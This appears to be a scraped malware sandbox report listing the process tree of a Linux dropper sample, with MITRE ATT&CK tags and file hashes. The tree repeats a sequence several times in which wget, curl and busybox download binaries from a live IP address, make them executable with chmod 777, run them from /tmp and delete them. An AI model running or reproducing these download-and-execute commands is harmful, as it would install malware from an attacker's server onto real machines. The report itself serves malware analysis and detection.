/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1657
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1663
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1669
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:1672
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1673
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1675
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:1678
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1679
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Writes file to tmp directory
PID:1680
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1681
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:1682
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:1683
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:1684
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97